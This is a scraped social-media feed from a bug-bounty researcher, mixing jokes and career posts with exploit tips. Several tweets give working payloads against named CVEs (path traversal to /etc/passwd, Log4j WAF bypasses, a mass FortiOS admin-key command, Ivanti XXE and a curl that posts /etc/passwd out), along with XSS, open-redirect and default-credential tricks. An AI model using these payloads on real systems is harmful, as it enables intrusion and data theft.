H4x0r.DZ🇩🇿 Profile Banner
H4x0r.DZ🇩🇿 Profile
H4x0r.DZ🇩🇿

@h4x0r_dz

Followers
50,349
Following
1,643
Media
1,360
Statuses
9,559

Hack the Planet

Hack The Planet
Joined December 2015
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@h4x0r_dz
H4x0r.DZ🇩🇿
4 years
A nice tricks to bypass 403/401. #BugBounty #bugbountytips
Tweet media one
Tweet media two
Tweet media three
69
1K
4K
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
Search for all leaked keys/secrets using one regex! regex: #BugBounty #bugbountytip
Tweet media one
97
745
2K
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
I wasted my entire life using PuTTY while MobaXterm exist #linux #ssh
Tweet media one
113
264
2K
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
CVE-2021-41773 POC 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Tweet media one
28
619
2K
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
If you Are Interested In Developing your Hacking skills Read some amazing @BlackHatEvents pdf <3. Demo Google dork: site: intext:"RCE" filetype:pdf #CyberSecurity #BugBounty #infosec
Tweet media one
16
484
1K
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF :
Tweet media one
11
445
1K
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
Grafana Exploit POC $HOST/public/plugins/graph/../../../../../../../../etc/passwd
Tweet media one
14
420
1K
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
CVE-2022-40684 ffuf -w "host_list.txt:URL" -u " https://URL/api/v2/cmdb/system/admin/admin" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r
Tweet media one
30
366
1K
@h4x0r_dz
H4x0r.DZ🇩🇿
1 month
LOL
Tweet media one
@h4x0r_dz
H4x0r.DZ🇩🇿
1 month
why there is an RCE on Microsoft? #infosec
Tweet media one
33
41
504
13
45
1K
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
A hacker with his Zero-day🥰 #infosec #Security #CyberAttack
33
184
1K
@h4x0r_dz
H4x0r.DZ🇩🇿
2 months
Find Leaked Credentials Using Google Chrome dev Tools (The Best Way 😎) #bugbountytips #bugbounty #infosec
Tweet media one
12
261
1K
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
when you are looking for bugs like SSRF & Open Redirect. and there is a blacklisted character. try to bypassed using other Unicode characters. I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82". poc: redirect_to=////evil%E3%80%82com #BugBounty #bugbountytip
Tweet media one
9
276
917
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
In this tweet, I will explain to you How to find Leaking AWS Keys.
Tweet media one
19
335
801
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
always when you found API endpoint like "/api/v4/anything" add "internal" to the route and you will be surprised 😃 for example : /api/v4/users/<userid> =>> 403 /api/v4/internal/users/<userid> =>> 200 #bugbountytips
10
255
783
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
I learned hacking by doing hacking! No CTF, certificate ,university...etc We are not the same, you are better than me #infosec
34
68
764
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
if this #TikTokBreach is true! it gonna be a bad week
Tweet media one
Tweet media two
13
187
753
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
44
150
739
@h4x0r_dz
H4x0r.DZ🇩🇿
4 years
#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png
6
255
727
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
19
171
694
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
We are Shopify, not Spotify 🤣
Tweet media one
26
46
676
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
Backup Files (does not exist on any Fuzzing wordlist ! ) hostname*com/hostname.rar , .sql.tar & .tar.gz & .tar.bzip2 & .tar & .sql.bz2 & .7z & .tar.bz2 & .sql.7z ....etc already found so many WordPress websites backups #bugbountytips
Tweet media one
15
177
657
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
I don't want to live in The matrix anymore This is the real Life :
Tweet media one
39
21
655
@h4x0r_dz
H4x0r.DZ🇩🇿
10 months
How to Get Unique Subdomains on Large scope ??? I hope you like it .
5
193
620
@h4x0r_dz
H4x0r.DZ🇩🇿
22 days
many APIs are vulnerable to "JSON Patch" where you have access to the op, you can add, remove, replace, move, copy example : { "op": "replace", "path": "/role", "value": "admin" }, more info : #BugBounty #bugbountytips
Tweet media one
7
159
624
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
I moved From bug bounty to ctf And I can confirm CTF is the real hacking, A bug bounty is just an easy game compared to ctf bug bounty : vulnerability assessment CTF : real hacking
74
44
607
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
GET /api/users/1337 => 401 GET /api/users/ x-user-id: 1337 =>> 200 Ok POST /api/users/<myID>/password-reset x-user-id: <victimID> full account takeover :) . #bugbountytips
Tweet media one
8
196
604
@h4x0r_dz
H4x0r.DZ🇩🇿
4 years
A simple way helped me to find more endpoints/info about #bugbounty target. maybe can help you! site: "target" site: "target" #PenTest #bugbountytip #OSINT #infosec
Tweet media one
Tweet media two
9
202
605
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
Some Devs use "Google Groups" as a workplace because it is easy and free. But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc . Dork: site: "$COMPANY" I already found a lot of leaked critical data #bugbountytips
Tweet media one
20
181
603
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
/..;/
Tweet media one
20
133
588
@h4x0r_dz
H4x0r.DZ🇩🇿
4 months
CVE-2024-22024, XXE on Ivanti Connect Secure payload encoded base64: <?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM " http://{{external-host}}/x"> %xxe;]><r></r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm #bugbountytips #cve #Ivanti
Tweet media one
3
140
598
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
People Who Doing Bug Bounty For Red Bull please stop. You Are Destroying The Field Don't Do Bug Bounty For Free & Drink & T-shirts ...etc When Companies Find Stupid Hackers Like You Who Work For Free, Many Other Companies Will Join The Club. please stop #BugBounty
33
97
581
@h4x0r_dz
H4x0r.DZ🇩🇿
4 years
I have a friend who joins #bugbounty Because of me. He didn't have good internet and no PC. just using his phone. He found 5 bugs using his phone with the worst internet in the world (Algeria). I really feel proud of this boy <3 .
Tweet media one
Tweet media two
31
58
584
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
Unknown recon Method via waybackurls $TARGET.app.box.com or just use google DORK : site: "$TARGET" Sometimes the employees upload sensitive files to the public on . #bugbountytips #bugbounty
Tweet media one
Tweet media two
6
204
556
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
Yay, I was awarded a $20,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder admin panel pwn > file upload > Arbitrary File Overwrite tip: read js files well!
42
41
548
@h4x0r_dz
H4x0r.DZ🇩🇿
3 months
what an incredible auth bypass! /foo?jsp=/authenticated-endpoint;.jsp CVE-2024-27198 TeamCity authentication bypass
Tweet media one
8
129
555
@h4x0r_dz
H4x0r.DZ🇩🇿
25 days
Holy shit, CVE-2024-4367 PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF #infosec
8
113
551
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
My Goal for the 2023 is to quit bug bounty | cybersecurity and other computer stuff and buy a farm and 10 cows 🐄 and 100 chickens and 1337 sheep . I'm still looking for the happiness ✍️
49
29
524
@h4x0r_dz
H4x0r.DZ🇩🇿
1 month
I used BBOT to enumerate subdomains, and I found New subs I had never seen in My Targets! Very Very useful on Large targets #BugBounty #bugbountytips #infosec
Tweet media one
14
111
532
@h4x0r_dz
H4x0r.DZ🇩🇿
9 months
I hacked Shopify/Spotify in the same day lol
Tweet media one
18
7
502
@h4x0r_dz
H4x0r.DZ🇩🇿
4 months
Jenkins CVE-2024-23897 Arbitrary file read vulnerability through the CLI can lead to RCE POC #BugBounty #vulnerabilities #rce
Tweet media one
13
83
511
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
Scanning APK file for URIs, endpoints & secrets Using APKLeaks by @dwisiswant0 1.install APKLeaksby 2. Download the APK file. 3. python3 -f app.apk Easy win <3. #bugbountytips #BugsBunny #infosec
Tweet media one
7
202
495
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
Thousands of US companies have been hacked by Chinese hackers using This RCE. Microsoft Exchange Server Remote Code Execution CVE-2021-26855 Exploit. #BugBounty #RCE #infosec
Tweet media one
Tweet media two
Tweet media three
Tweet media four
14
193
495
@h4x0r_dz
H4x0r.DZ🇩🇿
5 months
#bugbountytips There is a lot of web apps vulnerable to this issue
Tweet media one
@h4x0r_dz
H4x0r.DZ🇩🇿
5 months
Ok, here is another #bugbountytip You can find this issue with “login with Google ” too, or any other Idp providers During the signup process, delete the email value from the scope 💣
4
31
190
16
87
499
@h4x0r_dz
H4x0r.DZ🇩🇿
1 month
why there is an RCE on Microsoft? #infosec
Tweet media one
33
41
504
@h4x0r_dz
H4x0r.DZ🇩🇿
4 months
CVE-2024-21893 Ivanti Connect Secure SSRF to CVE-2024-21887 RCE http://127.0.0.1:8090/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd ;
Tweet media one
Tweet media two
9
110
498
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
Automation Time-based Blind SQL injection on HTTP Headers Using Blisqy tool by @JohnTroony . #BugBounty #bugbountytip
Tweet media one
7
216
481
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
Unfortunately, this was submitted previously by another researcher, but we appreciate your work and look forward to additional reports from you.
Tweet media one
37
58
476
@h4x0r_dz
H4x0r.DZ🇩🇿
8 months
We stand in solidarity with the people of Palestine 🇵🇸
20
45
456
@h4x0r_dz
H4x0r.DZ🇩🇿
21 days
I'm curious why @ECCOUNCIL offers such expensive certifications when they seem ineffective in cybersecurity. I'm currently taking the CEH course, and the browser-based lab keeps crashing. The PDF is over 2000 pages, with much of the content appearing to be copied from Google
Tweet media one
33
59
457
@h4x0r_dz
H4x0r.DZ🇩🇿
4 months
Someone claims he has root access to @RealTryHackMe servers he is selling it for 5k$ !
Tweet media one
Tweet media two
31
47
445
@h4x0r_dz
H4x0r.DZ🇩🇿
5 months
GitLab CE/EE Account Takeover via Password Reset without user interactions CVE-2023-7028 Poc: in the rest password endpoint user[email][]=valid @email .com&user[email][]=attacker @email .com #bugbountytip
6
89
445
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
How to use FFUF over multiple hosts $ for i in `cat host.txt`; do ffuf -u $i/FUZZ -w wordlist.txt -mc 200,302,401 -se ;done #bugbountytips #BugBounty #ffuf
Tweet media one
Tweet media two
18
158
438
@h4x0r_dz
H4x0r.DZ🇩🇿
4 years
Recon 😂😂👌
Tweet media one
16
64
422
@h4x0r_dz
H4x0r.DZ🇩🇿
9 months
I'm happy to share that I got OSCP Certificate for the first attempt. Thanks @offsectraining for the training #CyberSecurity #oscp
Tweet media one
56
5
421
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
beg BOUNTY 🤡 #infosec #bugbounty
Tweet media one
52
47
420
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
I just found Open Redirection on public #bugbounty program. I tried all Open Redirect payload {that I know}, and nothing work, only one payload: redirect_to=//evil.com\ @whiteliste .com I hope this will help you :). #bugbountytip
Tweet media one
7
114
409
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
infinite money printing bug on Coinbase. awarded $250k to the hacker POC :
Tweet media one
14
93
410
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
POC, CVE-2022-1388 F5 Big-IP RCE
Tweet media one
9
101
411
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
technique to bypass 2FA I did not saw it In any place. please tell me If it's public. steps : 1. enable 2FA In your account 2. login and send the 2FA code to your email & SMS. 3. Wait until the code 2FA expires (it's Depends ..) 4.put any code. 5. b00M! #bugbountytips
Tweet media one
20
136
391
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
Is it possible to get a job in cybersecurity without certifications ? #bugbountytips #infosec #cybersecurity
118
37
398
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
403 ?? Try This: .git/branches/ .git/COMMIT_EDITMSG .git/config .git/description .git/FETCH_HEAD .git/HEAD .git/hooks/ .git/index .git/info/ .git/info/exclude .git/logs/ .git/logs/HEAD .git/logs/refs .git/logs/refs/heads .git/logs/refs/heads/master [1]
2
162
392
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
20,000 person follow me , I don't know why there is so many people follow this useless guy. I don't deserve all these followers at all, but thanks everyone
Tweet media one
37
12
372
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
Tweet media one
11
42
353
@h4x0r_dz
H4x0r.DZ🇩🇿
17 days
CVE-2024-27130, an unauthenticated stack overflow bug, which allows remote-code execution on qnap credit @watchtowrcyber Yes Yes it is Friday , the perfect day to drop the 0day
Tweet media one
0
66
372
@h4x0r_dz
H4x0r.DZ🇩🇿
8 months
Bombing a hospital is a war crime, Israel is a terrorist
13
77
353
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
Cross Site Request Forgery (CSRF) is dead!
33
29
354
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
Tweet media one
72
35
356
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
CVE-2022-26134 Confluence RCE exploit automation : httpx -l list.txt -paths path.txt -match-string "gid="
5
106
354
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
Tweet media one
9
83
356
@h4x0r_dz
H4x0r.DZ🇩🇿
8 months
Tweet media one
6
60
340
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
CVE-2022-44268 ImageMagick Arbitrary File Read
8
64
349
@h4x0r_dz
H4x0r.DZ🇩🇿
24 days
CVE-2024-34351 : Server-Side Request Forgery on Next.js POC: POST /x HTTP/2 Host: attacker*com Content-Length: 2 Next-Action: xxxx {} #BugBounty #bugbountytips
Tweet media one
3
65
359
@h4x0r_dz
H4x0r.DZ🇩🇿
1 month
Yay, I was awarded a $5,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder out-of-bounds write in Fortinet CVE-2024-21762 👀
20
12
352
@h4x0r_dz
H4x0r.DZ🇩🇿
5 months
RCE via insecure ~/.ssh/config #infosecurity #CyberSecurity
Tweet media one
2
72
338
@h4x0r_dz
H4x0r.DZ🇩🇿
2 months
If The target is running the Postgres SQL server put the Unicode char "\u0000" and see the magic 😄 note: this can break the database
9
45
348
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
bug bounty is just unpaid pentests
11
29
336
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
Do not forget to Try login with This Credential In your #bugbounty Target : Email: demo@<company>.com & test<company>.com Password: demo@<company>.com , 123456789,123456,root, ..other default passwords . You will log in to The Company as an Admin If you are lucky. #bugbountytip
8
110
326
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
I feel I'm Super Hacker This Morning ! To download java from you need to create account And the steps are so boring so I bypassed the login step 😂
Tweet media one
35
27
328
@h4x0r_dz
H4x0r.DZ🇩🇿
1 year
trick to find hidden endpoints on web apps, start with Underscore (_) ffuf -w wordlist.txt -u #bugbountytip #BugBounty
4
65
325
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
20 Content spoofing and 80 Clickjacking in one day Expecting 215478$ USD Payload used :- <҉<҉<҉<҉<҉>҉>҉>҉>҉<҉<҉>҉<҉ #bugbountytips
38
43
316
@h4x0r_dz
H4x0r.DZ🇩🇿
1 month
did use njRAT before? #infosec
Tweet media one
59
29
319
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
someone is fasting and wrote <javascript> instead <script> 😂😂😂😂😂 I spent 20 mint figuring out why my code is not working 😂😂😂😂 #javascript #RamadanMubarak
Tweet media one
26
24
305
@h4x0r_dz
H4x0r.DZ🇩🇿
5 months
sometimes you can takeover the subdomain sometimes you can takeover the entire domain lol #BugBounty
Tweet media one
16
11
309
@h4x0r_dz
H4x0r.DZ🇩🇿
3 years
Instagram fixed my 2fa bypass and closes my report informative and they said the bug not working! and I still have a video where I recorded the POC . any suggestions guys? #BugBounty
33
33
301
@h4x0r_dz
H4x0r.DZ🇩🇿
2 months
c99.php ♥️
Tweet media one
31
23
310
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
bug bounty programs that use java apps will receive thousands of reports about #log4j stop using java !!
Tweet media one
6
56
300
@h4x0r_dz
H4x0r.DZ🇩🇿
10 months
Program : New scope added bug Bounty Hunter :
Tweet media one
14
18
299
@h4x0r_dz
H4x0r.DZ🇩🇿
1 month
CVE-2024-4040 Authentication Bypass && Arbitrary File Read in CrushFTP
Tweet media one
2
64
302
@h4x0r_dz
H4x0r.DZ🇩🇿
4 months
🎉 Excited to announce I’ve earned my CRTP (Certified Red Team Professional) certificate! #redream #CyberSecurity
Tweet media one
30
4
297
@h4x0r_dz
H4x0r.DZ🇩🇿
10 months
Thank you bug bounty !
Tweet media one
@DeniTechh
Deni | denitech.dev
10 months
Thank you Javascript.
Tweet media one
464
1K
19K
15
10
281
@h4x0r_dz
H4x0r.DZ🇩🇿
8 months
if you found apollo-server exposed on /api/graphql , you can manipulate the embedded page via endpoint URL parm , and inject your own host to receive the graphql query (steal users' information ..etc ) #bugbounty #bugbountytips
Tweet media one
5
55
289
@h4x0r_dz
H4x0r.DZ🇩🇿
2 years
FU*K this shit after hours of writing on @Medium the post didn't save now I need to rewrite it again. I believe Medium is the worst place to share write-ups, is there any alternative?
Tweet media one
38
17
289
@h4x0r_dz
H4x0r.DZ🇩🇿
2 months
as a cybersecurity guy || describe this picture #infosec
Tweet media one
45
19
293